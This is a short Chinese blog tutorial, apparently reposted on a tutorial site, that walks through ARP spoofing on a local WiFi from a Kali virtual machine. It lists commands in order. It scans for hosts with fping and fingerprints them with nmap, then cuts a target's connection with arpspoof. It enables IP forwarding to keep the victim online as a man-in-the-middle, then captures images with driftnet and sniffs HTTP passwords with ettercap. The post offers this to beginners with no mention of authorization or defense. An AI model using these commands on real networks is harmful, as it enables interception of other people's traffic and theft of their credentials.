Kali虚拟机下的arp欺骗

两盒软妹~` 提交于 2020-01-18 23:47:22

arp攻击

查看本机ip

使用指令ifconfig inet之后的便是IPV4地址

在这里插入图片描述

查一下和自己在同一WiFi下的其他设备

命令: fping -g -r 0 -s 192.168.31.48/24 | grep alive

进行目标IP系统探测(探测是什么系统:电脑or手机)

命令:nmap -T4 -O (目标IP)

arp断网攻击

命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1

形式:arpspoof -i eth0(一般虚拟机默认为此) -t 目标IP -r 网关

arp欺骗

查本机ip -------------- ifconfig

查和自己处在同一WiFi下的IP ------------ fping -g -r 0 -s 192.168.31.48/24 | grep alive

既然是欺骗,那就不能让目标主机断网,所以要更改配置文件

命令:echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

arp攻击

命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1

抓图片

driftnet -i eth0

实现密码嗅探

ettercap -Tq -i eth0

注意:图片嗅探会有延迟,没有想象中那么及时。
密码嗅探只能嗅探http的,https不行。
欢迎大家批评指正,本文仅供小白满足好奇心。

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!